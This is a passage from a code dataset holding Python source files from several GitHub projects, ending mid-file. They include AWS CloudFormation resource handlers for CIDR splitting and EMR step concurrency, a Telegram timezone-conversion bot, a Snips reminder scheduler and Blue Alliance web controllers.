metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "joseph-behrens/cfn-resource-cidr-helper",
"score": 2
} |
#### File: src/jb_vpc_cidrcalc/handlers.py
```python
import logging
import boto3
import ipaddress
import netaddr
import boto3
import uuid
from botocore.exceptions import ClientError
from typing import Any, MutableMapping, Optional
from cloudformation_cli_python_lib import (
Action,
HandlerErrorCode,
OperationStatus,
ProgressEvent,
Resource,
SessionProxy,
exceptions,
)
from .models import ResourceHandlerRequest, ResourceModel
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
TYPE_NAME = "JB::VPC::CidrCalc"
resource = Resource(TYPE_NAME, ResourceModel)
test_entrypoint = resource.test_entrypoint
class Lister:
def __init__(self):
super().__init__()
def split_by_host_numbers(self, starting_cidr, list_of_num_hosts):
cidr_list = []
for num_hosts in list_of_num_hosts:
next_cidr = CIDR(ipaddress.IPv4Network(
starting_cidr)[0], num_hosts).get_cidr()
cidr_list.append(str(next_cidr))
starting_cidr = ipaddress.IPv4Network(next_cidr)[-1] + 1
return cidr_list
def split_by_prefix(self, cidr_to_split, prefix):
cidr_list = CIDR(cidr_to_split, 0).split_by_prefix(
cidr_to_split, prefix)
return cidr_list
class CIDR:
def __init__(self, starting_address, number_of_hosts):
super().__init__()
self.starting_address = starting_address
self.number_of_hosts = number_of_hosts
self.map = {
16: 28,
32: 27,
64: 26,
128: 25,
256: 24,
512: 23,
1000: 22,
2000: 21,
4000: 20,
8000: 19,
16000: 18,
32000: 17,
64000: 16
}
def _find_closest(self, num):
list_of_host_nums = list(self.map.keys())
closest = min(list_of_host_nums, key=lambda x: abs(x-num))
if closest < num:
try:
closest = list_of_host_nums[list_of_host_nums.index(
closest) + 1]
except IndexError:
raise ValueError(
f"Subnets must be in range of 16 to 64,000 hosts, {num} is outside the upper bound")
return closest
def _get_starting_cidr(self):
suffix = self.map[self._find_closest(self.number_of_hosts)]
return ipaddress.ip_network(str(self.starting_address) + '/' + str(suffix), False)
def get_cidr(self):
starting = self._get_starting_cidr()
if starting[0] < ipaddress.ip_address(self.starting_address):
return str(netaddr.IPNetwork(str(starting)).next())
return str(starting)
def split_by_prefix(self, cidr_to_split, new_prefix):
starting = ipaddress.ip_network(cidr_to_split, False)
cidrs = starting.subnets(new_prefix=new_prefix)
return [str(address) for address in cidrs]
def set_cidr_list(model):
if model.HostCounts:
if not isinstance(model.HostCounts, list) or not all(isinstance(item, int) for item in model.HostCounts):
raise exceptions.InvalidRequest(
f"Host number list must be an array of integers, received {model.HostCounts}")
try:
cidr_list = Lister().split_by_host_numbers(
model.CidrToSplit, model.HostCounts)
except ValueError as value_error:
raise exceptions.InvalidRequest(str(value_error))
elif model.PrefixForEvenSplit:
cidr_list = Lister().split_by_prefix(model.CidrToSplit, model.PrefixForEvenSplit)
else:
raise exceptions.InvalidRequest(
f"Must pass either a host count list or a prefix to split the cidr by")
return cidr_list
def write_ssm_parameters(name, value, param_type, session):
try:
ssm = session.client('ssm')
ssm.put_parameter(
Name=name,
Value=value,
Type=param_type,
Overwrite=True
)
except ClientError as client_error:
raise exceptions.InternalFailure(str(client_error))
def get_ssm_parameter(name, session):
try:
ssm = session.client('ssm')
response = ssm.get_parameter(Name=name)
return response['Parameter']['Value']
except ClientError:
raise exceptions.NotFound(TYPE_NAME, name)
def remove_ssm_parameter(name, session):
try:
ssm = session.client('ssm')
ssm.delete_parameter(Name=name)
except ClientError as client_error:
raise exceptions.InternalFailure(str(client_error))
@resource.handler(Action.CREATE)
def create_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
model.UID = str(uuid.uuid4())
model.CIDRs = ','.join(set_cidr_list(model))
write_ssm_parameters(model.UID + '-CidrList',
model.CIDRs, 'StringList', session)
write_ssm_parameters(model.UID + '-State', 'CREATED', 'String', session)
progress.status = OperationStatus.SUCCESS
return progress
@ resource.handler(Action.UPDATE)
def update_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
if not model.UID:
raise exceptions.NotFound(TYPE_NAME, 'UID')
state = get_ssm_parameter(model.UID + '-State', session)
if state == 'DELETED':
raise exceptions.NotFound(TYPE_NAME, 'UID')
model.CIDRs = ','.join(set_cidr_list(model))
write_ssm_parameters(model.UID + '-CidrList',
model.CIDRs, 'StringList', session)
write_ssm_parameters(model.UID + '-State', 'UPDATED', 'String', session)
progress.status = OperationStatus.SUCCESS
return progress
@ resource.handler(Action.DELETE)
def delete_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
state = get_ssm_parameter(model.UID + '-State', session)
if state == 'DELETED':
progress.status = OperationStatus.FAILED
raise exceptions.NotFound(TYPE_NAME, 'UID')
elif state == 'CREATED' or state == 'UPDATED':
remove_ssm_parameter(model.UID + '-CidrList', session)
write_ssm_parameters(model.UID + '-State',
'DELETED', 'String', session)
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=None,
)
else:
raise exceptions.NotFound(TYPE_NAME, state)
@ resource.handler(Action.READ)
def read_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
if get_ssm_parameter(model.UID + '-State', session) == 'DELETED':
raise exceptions.NotFound(TYPE_NAME, 'UID')
model.CIDRs = get_ssm_parameter(
model.UID + '-CidrList', session)
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=model,
)
```
#### File: cfn-resource-cidr-helper/tests/unit_tests.py
```python
import unittest
from jb_vpc_cidrcalc.handlers import CIDR
from jb_vpc_cidrcalc.handlers import Lister
cidr_maps = {
16: 28,
32: 27,
64: 26,
128: 25,
256: 24,
512: 23,
1000: 22,
2000: 21,
4000: 20,
8000: 19,
16000: 18,
32000: 17,
64000: 16
}
class CalculatorTests(unittest.TestCase):
def test_instantiation(self):
cidr = CIDR('10.0.0.0', 22)
self.assertEqual(cidr.number_of_hosts, 22)
self.assertEqual(cidr.starting_address, '10.0.0.0')
self.assertDictEqual(cidr_maps, cidr.map)
def test_next_cidr(self):
cidr = CIDR('10.0.0.0', 250)
next_cidr = cidr.get_cidr()
self.assertEqual(next_cidr, '10.0.0.0/24')
def test_out_of_range(self):
with self.assertRaises(ValueError):
cidr = CIDR('10.0.0.0', 64001)
cidr.get_cidr()
def test_split_by_prefix(self):
cidr = CIDR(None, None)
expected_list = ['10.0.0.0/26', '10.0.0.64/26',
'10.0.0.128/26', '10.0.0.192/26']
self.assertEqual(cidr.split_by_prefix(
'10.0.0.0/24', 26), expected_list)
class GeneratorTests(unittest.TestCase):
def test_split_by_hosts(self):
cidrs = Lister().split_by_host_numbers(
'10.0.0.0', [64, 128, 64, 250, 500])
expected_list = ['10.0.0.0/26', '10.0.0.128/25',
'10.0.1.0/26', '10.0.2.0/24', '10.0.4.0/23']
self.assertEqual(cidrs, expected_list)
def test_split_by_prefix(self):
cidrs = Lister().split_by_prefix('10.0.0.0/24', 26)
expected_list = ['10.0.0.0/26', '10.0.0.64/26',
'10.0.0.128/26', '10.0.0.192/26']
self.assertEqual(cidrs, expected_list)
def test_out_of_range(self):
with self.assertRaises(ValueError):
cidrs = Lister().split_by_host_numbers(
'10.0.0.0', [64, 128, 64, 250, 500000])
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "joseph-behrens/cfn-resource-type-emr-stepconcurrency",
"score": 2
} |
#### File: src/jb_emr_stepconcurrencylevel/handlers.py
```python
import logging
from typing import Any, MutableMapping, Optional
from cloudformation_cli_python_lib import (
Action,
HandlerErrorCode,
OperationStatus,
ProgressEvent,
Resource,
SessionProxy,
exceptions,
)
from .models import ResourceHandlerRequest, ResourceModel
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
LOG.setLevel("INFO")
TYPE_NAME = "JB::EMR::StepConcurrencyLevel"
resource = Resource(TYPE_NAME, ResourceModel) # pylint: disable=invalid-name
test_entrypoint = resource.test_entrypoint # pylint: disable=invalid-name
def get_cluster_info(session: Optional[SessionProxy], cluster_id: str) -> dict:
"""This function will gather all information from a describe cluster
call to the given cluster ID
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
dict: A dictionary of the cluster attributes
"""
client = session.client('emr')
LOG.info("Getting all info for cluster %s", cluster_id)
response = client.describe_cluster(
ClusterId=cluster_id
)
LOG.info("RESPONSE: %s", response)
return response
def get_uid(session: Optional[SessionProxy], cluster_id: str) -> str:
"""This function will retreive the value of the tag "StepConcurrencyUID"
from the given cluster ID
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
str: The value of the StepConcurrencyUID tag in the cluster
"""
response = get_cluster_info(session, cluster_id)
LOG.info("Gathering tags for cluster %s", cluster_id)
tags = response["Cluster"]["Tags"]
LOG.info(tags)
for tag in tags:
if tag['Key'] == "StepConcurrencyUID":
LOG.info("Found concurrency tag")
LOG.info(tag["Value"])
return tag["Value"]
LOG.info("Didn't find concurrency tag")
return None
def get_concurrency_level(session: Optional[SessionProxy], cluster_id: str) -> str:
"""This function will retreive the current value of StepConcurrencyLevel
from the given cluster
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
str: The value of the StepConcurrencyLevel attribute in the cluster
"""
response = get_cluster_info(session, cluster_id)
LOG.info("Gathering concurrency for cluster %s", cluster_id)
return response["Cluster"]["StepConcurrencyLevel"]
@resource.handler(Action.CREATE)
def create_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation CREATE event
and will set the StepConcurrency level from the default of 1
to the new provided value within the up to the max of 256. It
will also add a tag to the cluster in order to keep track of
the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
LOG.info("Create Handler")
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
model.UID = "cluster:" + model.ClusterId
model.StepConcurrencyLevel = int(model.StepConcurrencyLevel)
uid = get_uid(session, model.ClusterId)
LOG.info("UID: %s", uid)
if uid == model.UID:
raise exceptions.AlreadyExists(TYPE_NAME, model.ClusterId)
if model.StepConcurrencyLevel < 1 or model.StepConcurrencyLevel > 256:
raise exceptions.InvalidRequest(
f"Step Concurency Level must be between 1 and 256, \
{model.StepConcurrencyLevel} was given.")
try:
client = session.client('emr')
LOG.info("Setting concurrency to %s for cluster %s",
model.StepConcurrencyLevel, model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=int(model.StepConcurrencyLevel)
)
LOG.info("RESPONSE TO SET CONCURRENCY:")
LOG.info(response)
LOG.info("Setting UID tag to %s", model.ClusterId)
tag_response = client.add_tags(
ResourceId=model.ClusterId,
Tags=[
{
"Key": "StepConcurrencyUID",
"Value": model.UID
}
]
)
LOG.info("RESPONSE TO ADD TAGS:")
LOG.info(tag_response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Create: {str(unexpected_exception)}")
return progress
@resource.handler(Action.UPDATE)
def update_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation UPDATE event
and will update the StepConcurrency level to the new provided
value within the up to the max of 256. It will also add a tag to
the cluster in order to keep track of the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
previous_model = request.previousResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
LOG.info("UPDATE HANDLER")
LOG.info("MODEL")
LOG.info(model)
LOG.info("PREVIOUS")
LOG.info(previous_model)
model.StepConcurrencyLevel = int(model.StepConcurrencyLevel)
if model.UID != previous_model.UID:
raise exceptions.InvalidRequest("Cannot update the UID")
if model.StepConcurrencyLevel < 1 or model.StepConcurrencyLevel > 256:
raise exceptions.InvalidRequest(
f"Step Concurency Level must be between 1 and 256, \
{model.StepConcurrencyLevel} was given.")
if model.UID != get_uid(session, model.ClusterId):
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
client = session.client('emr')
LOG.info("Updating concurrency to %s for cluster %s",
model.StepConcurrencyLevel, model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=model.StepConcurrencyLevel
)
LOG.info("RESPONSE: %s", response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Update: {str(unexpected_exception)}")
return progress
@resource.handler(Action.DELETE)
def delete_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation DELETE event
and will set the StepConcurrency level to the default of 1.
It will also remove a tag on the cluster in order to keep track of
the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
LOG.info("DELETE HANDLER")
if get_uid(session, model.ClusterId) != model.UID:
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
client = session.client('emr')
LOG.info("Setting concurrency to default for cluster %s",
model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=1
)
LOG.info("RESPONSE:")
LOG.info("RESPONSE:")
LOG.info(response)
progress.resourceModel = None
LOG.info("Removing Tags")
tags_response = client.remove_tags(
ResourceId=model.ClusterId,
TagKeys=["StepConcurrencyUID"]
)
LOG.info("TAG REMOVAL RESPONSE")
LOG.info(tags_response)
LOG.info("TAG REMOVAL RESPONSE: %s", tags_response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Delete: {str(unexpected_exception)}")
return progress
@resource.handler(Action.READ)
def read_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation READ event
and will retrieve the StepConcurrency level of the cluster.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
if model.UID != get_uid(session, model.ClusterId):
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
model.StepConcurrencyLevel = get_concurrency_level(
session, model.ClusterId)
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Read: {str(unexpected_exception)}")
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=model,
)
``` |
{
"source": "joseph-behrens/vaccine-availability-notifications",
"score": 3
} |
#### File: chalicelib/services/vaccinespotter_service.py
```python
from typing import Optional
import requests
from requests import HTTPError, Timeout
from chalicelib.logs.utils import get_logger
logger = get_logger(__name__)
def fetch_availability_for_state(state_abbr: str) -> Optional[dict]:
"""
Retrieves the vaccine availability for a given state
"""
logger.info(
"Retrieving vaccine availability for state",
extra={"state": state_abbr},
)
try:
response = requests.get(
f"https://www.vaccinespotter.org/api/v0/states/{state_abbr}.json",
timeout=10,
)
except (HTTPError, Timeout) as e:
logger.error(
"Failed to process state availability",
extra={"exception": e, "state": state_abbr},
)
return None
return response.json()
``` |
{
"source": "JosephBerman/DungeonPi",
"score": 3
} |
#### File: src/characterClass/CharacterClass.py
```python
from src.Constants import *
CONSTANT = Constants()
class CharacterClass:
def __init__(self, nm: str, ht: int, ba: int):
self._name = nm
self._baseHealth = ht
self._baseArmor = ba
def printClass(self):
print(self._name, self._baseHealth, self._baseArmor)
def getName(self):
return self._name
def getHealth(self):
return self._baseHealth
def getBaseArmor(self):
return self._baseArmor
class EmptyClass(CharacterClass):
def __init__(self):
super().__init__(CONSTANT.NONE, 0, 0)
```
#### File: src/characterClass/ProtagonistClasses.py
```python
from .CharacterClass import CharacterClass
class Wizard(CharacterClass):
def __init__(self):
super().__init__("Wizard", 6, 10)
self._mana = 10
class Monk(CharacterClass):
def __init__(self):
super().__init__("Monk", 6, 14)
self._ki = 3
class Barbarian(CharacterClass):
def __init__(self):
super().__init__("Barbarian", 12, 10)
class Archer(CharacterClass):
def __init__(self):
super().__init__("Archer", 8, 10)
``` |
{
"source": "JosephBGerber/snips-scheduler",
"score": 2
} |
#### File: JosephBGerber/snips-scheduler/action-scheduler.py
```python
from typing import Dict
import time
import threading
from hermes_python.hermes import Hermes, IntentMessage
from hermes_python.ffi.utils import MqttOptions
from hermes_python.ontology import *
import io
import db
def set_reminder_callback(hermes, intent_message):
# type: (Hermes, IntentMessage) -> None
handle = db.Database()
event_time_str = intent_message.slots["time"].first().value[:-7] # remove timezone information for the time value
event_time_struct = time.strptime(event_time_str, "%Y-%m-%d %H:%M:%S") # parse the str time into a time.time_struct
event_time = time.mktime(event_time_struct) # store the resulting epoch time
if len(intent_message.slots) == 1:
uuid = handle.create_event(event_time)
message = "Reminder created at %I %M %p with an I D of {}".format(uuid)
message = time.strftime(message, event_time_struct)
hermes.publish_end_session(intent_message.session_id, message)
return
if len(intent_message.slots) == 2:
event = intent_message.slots["event"].first().value
uuid = handle.create_event(event_time)
message = "Reminder created to {} at %I %M %p with an I D of {}".format(
event,
uuid)
message = time.strftime(message, event_time_struct)
hermes.publish_end_session(intent_message.session_id, message)
return
def delete_reminder_callback(hermes, intent_message):
# type: (Hermes, IntentMessage) -> None
uuid = intent_message.slots["uuid"].first().value
handle = db.Database()
handle.delete_event(uuid)
message = "Reminder with I D {} deleted".format(uuid)
hermes.publish_end_session(intent_message.session_id, message)
def event_thread(hermes):
# type: (Hermes) -> None
handle = db.Database()
while True:
time.sleep(1)
for (uuid, name) in handle.get_due_events():
if name is None:
hermes.publish_start_session_notification("default", "This is a reminder to do your stuff.", None)
handle.delete_event(uuid)
else:
message = "This is a reminder to {}".format(name)
hermes.publish_start_session_notification("default", message, None)
handle.delete_event(uuid)
if __name__ == "__main__":
mqtt_opts = MqttOptions()
with Hermes(mqtt_options=mqtt_opts) as h:
threading.Thread(target=event_thread, args=(h,)).start()
h.subscribe_intent("JosephBGerber:SetReminder", set_reminder_callback)\
.subscribe_intent("JosephBGerber:DeleteReminder", delete_reminder_callback)\
.start()
``` |
{
"source": "josephbirkner/telegram-timezone-bot",
"score": 2
} |
#### File: josephbirkner/telegram-timezone-bot/main.py
```python
import logging
import sys
from telegram.ext import Updater, MessageHandler, Filters
from datetime import datetime
from pytz import all_timezones_set, timezone, utc
import re
from os.path import join, dirname, abspath
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
OFFLINE = len(sys.argv) > 1 and sys.argv[1] == "offline"
FREEDOM_TIMEZONES = {"edt", "est", "pst", "pdt"}
ALL_TIMEZONES = {tz.lower() for tz in all_timezones_set} | FREEDOM_TIMEZONES
query_re = re.compile(
f"(?:[^\\d]+|\\d[^\\d:])*\\b(\\d{{1,2}})(?::(\\d{{1,2}}))?\\s*(am|pm)?\\s*({'|'.join(ALL_TIMEZONES)})?\\s+(?:(in|to)\\s+)?({'|'.join(ALL_TIMEZONES)})\\b.*"
)
def make_timezone(name: str) -> timezone:
if name == "edt" or name == "est":
tz = timezone("US/Eastern")
elif name == "cest":
tz = timezone("CET")
elif name == "pdt" or name == "pst":
tz = timezone("US/Pacific")
else:
tz = timezone(name.upper())
return tz
def make_time(name: str, hour: int, minute: int) -> datetime:
now = utc.localize(datetime.now())
return make_timezone(name).localize(datetime(
year=now.year,
month=now.month,
day=now.day,
hour=hour,
minute=minute),
is_dst=True)
def make_response(user_input: str):
match = query_re.match(user_input)
if not match:
return
try:
src_hour = int(match.group(1) or "0")
src_min = int(match.group(2) or "0")
src_pm = match.group(3)
src_tz = match.group(4)
src_separator = match.group(5)
dest_tz = match.group(6)
# Default src/dst timezone
if not src_tz and not src_separator:
src_tz = dest_tz
dest_tz = "cet" if src_tz in FREEDOM_TIMEZONES else "est"
elif not src_tz:
src_tz = "cet" if dest_tz in FREEDOM_TIMEZONES else "est"
# AM/PM Conversions
if src_pm == "pm" and src_hour < 12:
src_hour += 12
elif src_pm == "pm" and src_hour == 12:
src_hour = 0
orig_time = make_time(src_tz, src_hour, src_min)
result_time = orig_time.astimezone(make_timezone(dest_tz))
response = result_time.strftime('%H:%M %Z')
if response:
if dest_tz in FREEDOM_TIMEZONES:
return f"That's {response} ๐๐บ๐ธ๐บ๐ธ"
else:
return f"That's {response} ๐ช๐บ๐"
except Exception as e:
return f"Whatevs ๐ ({e})"
if not OFFLINE:
def process_message(update, context):
msg = update.message.text.lower()
response = make_response(msg)
if response:
context.bot.send_message(chat_id=update.effective_chat.id, text=response)
with open(join(abspath(dirname(__file__)), "token"), "r") as token_file:
token = token_file.read()
updater = Updater(token=token, use_context=True)
message_handler = MessageHandler(Filters.text & (~Filters.command), process_message)
updater.dispatcher.add_handler(message_handler)
updater.start_polling()
updater.idle()
else:
user_input_text = ""
while True:
user_input_text = input().lower()
if user_input_text in {"q", "exit", "quit"}:
break
print(f"> {make_response(user_input_text)}")
``` |
{
"source": "josephbisch/the-blue-alliance",
"score": 2
} |
#### File: the-blue-alliance/controllers/ajax_controller.py
```python
import os
import urllib2
import json
import time
from base_controller import CacheableHandler, LoggedInHandler
from google.appengine.api import memcache
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
from helpers.model_to_dict import ModelToDict
from helpers.mytba_helper import MyTBAHelper
from models.account import Account
from models.event import Event
from models.favorite import Favorite
from models.sitevar import Sitevar
from models.typeahead_entry import TypeaheadEntry
class AccountFavoritesHandler(LoggedInHandler):
"""
For getting an account's favorites
"""
def get(self, model_type):
if not self.user_bundle.user:
self.response.set_status(401)
return
favorites = Favorite.query(
Favorite.model_type==int(model_type),
ancestor=ndb.Key(Account, self.user_bundle.user.user_id())).fetch()
self.response.out.write(json.dumps([ModelToDict.favoriteConverter(fav) for fav in favorites]))
class AccountFavoritesAddHandler(LoggedInHandler):
"""
For adding an account's favorites
"""
def post(self):
if not self.user_bundle.user:
self.response.set_status(401)
return
model_type = int(self.request.get("model_type"))
model_key = self.request.get("model_key")
user_id = self.user_bundle.user.user_id()
fav = Favorite(
parent=ndb.Key(Account, user_id),
user_id=user_id,
model_key=model_key,
model_type=model_type
)
MyTBAHelper.add_favorite(fav)
class AccountFavoritesDeleteHandler(LoggedInHandler):
"""
For deleting an account's favorites
"""
def post(self):
if not self.user_bundle.user:
self.response.set_status(401)
return
model_key = self.request.get("model_key")
user_id = self.user_bundle.user.user_id()
MyTBAHelper.remove_favorite(user_id, model_key)
class LiveEventHandler(CacheableHandler):
"""
Returns the necessary details to render live components
Uses timestamp for aggressive caching
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "live-event:{}:{}" # (event_key, timestamp)
def __init__(self, *args, **kw):
super(LiveEventHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 10
def get(self, event_key, timestamp):
if int(timestamp) > time.time():
self.abort(404)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(event_key, timestamp)
super(LiveEventHandler, self).get(event_key, timestamp)
def _render(self, event_key, timestamp):
self.response.headers['Cache-Control'] = 'public, max-age=%d' % self._cache_expiration
self.response.headers['Pragma'] = 'Public'
self.response.headers['content-type'] = 'application/json; charset="utf-8"'
event = Event.get_by_id(event_key)
matches = []
for match in event.matches:
matches.append({
'name': match.short_name,
'alliances': match.alliances,
'order': match.play_order,
'time_str': match.time_string,
})
event_dict = {
# 'rankings': event.rankings,
# 'matchstats': event.matchstats,
'matches': matches,
}
return json.dumps(event_dict)
class TypeaheadHandler(CacheableHandler):
"""
Currently just returns a list of all teams and events
Needs to be optimized at some point.
Tried a trie but the datastructure was too big to
fit into memcache efficiently
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "typeahead_entries:{}" # (search_key)
def __init__(self, *args, **kw):
super(TypeaheadHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 60 * 24
def get(self, search_key):
search_key = urllib2.unquote(search_key)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(search_key)
super(TypeaheadHandler, self).get(search_key)
def _render(self, search_key):
self.response.headers['Cache-Control'] = 'public, max-age=%d' % self._cache_expiration
self.response.headers['Pragma'] = 'Public'
self.response.headers['content-type'] = 'application/json; charset="utf-8"'
entry = TypeaheadEntry.get_by_id(search_key)
if entry is None:
return '[]'
else:
if self._has_been_modified_since(entry.updated):
return entry.data_json
else:
return None
class WebcastHandler(CacheableHandler):
"""
Returns the HTML necessary to generate the webcast embed for a given event
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "webcast_{}_{}" # (event_key)
def __init__(self, *args, **kw):
super(WebcastHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 60 * 24
def get(self, event_key, webcast_number):
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(event_key, webcast_number)
super(WebcastHandler, self).get(event_key, webcast_number)
def _render(self, event_key, webcast_number):
self.response.headers['Cache-Control'] = "public, max-age=%d" % (5 * 60)
self.response.headers['Pragma'] = 'Public'
self.response.headers.add_header('content-type', 'application/json', charset='utf-8')
output = {}
if not webcast_number.isdigit():
return json.dumps(output)
webcast_number = int(webcast_number) - 1
event = Event.get_by_id(event_key)
if event and event.webcast:
webcast = event.webcast[webcast_number]
if 'type' in webcast and 'channel' in webcast:
output['player'] = self._renderPlayer(webcast)
else:
special_webcasts_future = Sitevar.get_by_id_async('gameday.special_webcasts')
special_webcasts = special_webcasts_future.get_result()
if special_webcasts:
special_webcasts = special_webcasts.contents
else:
special_webcasts = {}
if event_key in special_webcasts:
webcast = special_webcasts[event_key]
if 'type' in webcast and 'channel' in webcast:
output['player'] = self._renderPlayer(webcast)
return json.dumps(output)
def _renderPlayer(self, webcast):
webcast_type = webcast['type']
template_values = {'webcast': webcast}
path = os.path.join(os.path.dirname(__file__), '../templates/webcast/' + webcast_type + '.html')
return template.render(path, template_values)
def memcacheFlush(self, event_key):
keys = [self.CACHE_KEY_FORMAT.format(event_key, n) for n in range(10)]
memcache.delete_multi(keys)
return keys
```
#### File: controllers/api/api_event_controller.py
```python
import json
import logging
import webapp2
from datetime import datetime
from google.appengine.ext import ndb
from controllers.api.api_base_controller import ApiBaseController
from database.event_query import EventListQuery
from helpers.award_helper import AwardHelper
from helpers.district_helper import DistrictHelper
from helpers.model_to_dict import ModelToDict
from models.event import Event
class ApiEventController(ApiBaseController):
CACHE_KEY_FORMAT = "apiv2_event_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60
def __init__(self, *args, **kw):
super(ApiEventController, self).__init__(*args, **kw)
self.event_key = self.request.route_kwargs["event_key"]
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
@property
def _validators(self):
return [("event_id_validator", self.event_key)]
def _set_event(self, event_key):
self.event = Event.get_by_id(event_key)
if self.event is None:
self._errors = json.dumps({"404": "%s event not found" % self.event_key})
self.abort(404)
def _track_call(self, event_key):
self._track_call_defer('event', event_key)
def _render(self, event_key):
self._set_event(event_key)
event_dict = ModelToDict.eventConverter(self.event)
return json.dumps(event_dict, ensure_ascii=True)
class ApiEventTeamsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_teams_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60
def __init__(self, *args, **kw):
super(ApiEventTeamsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/teams', event_key)
def _render(self, event_key):
self._set_event(event_key)
teams = filter(None, self.event.teams)
team_dicts = [ModelToDict.teamConverter(team) for team in teams]
return json.dumps(team_dicts, ensure_ascii=True)
class ApiEventMatchesController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_matches_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventMatchesController, self).__init__(*args, **kw)
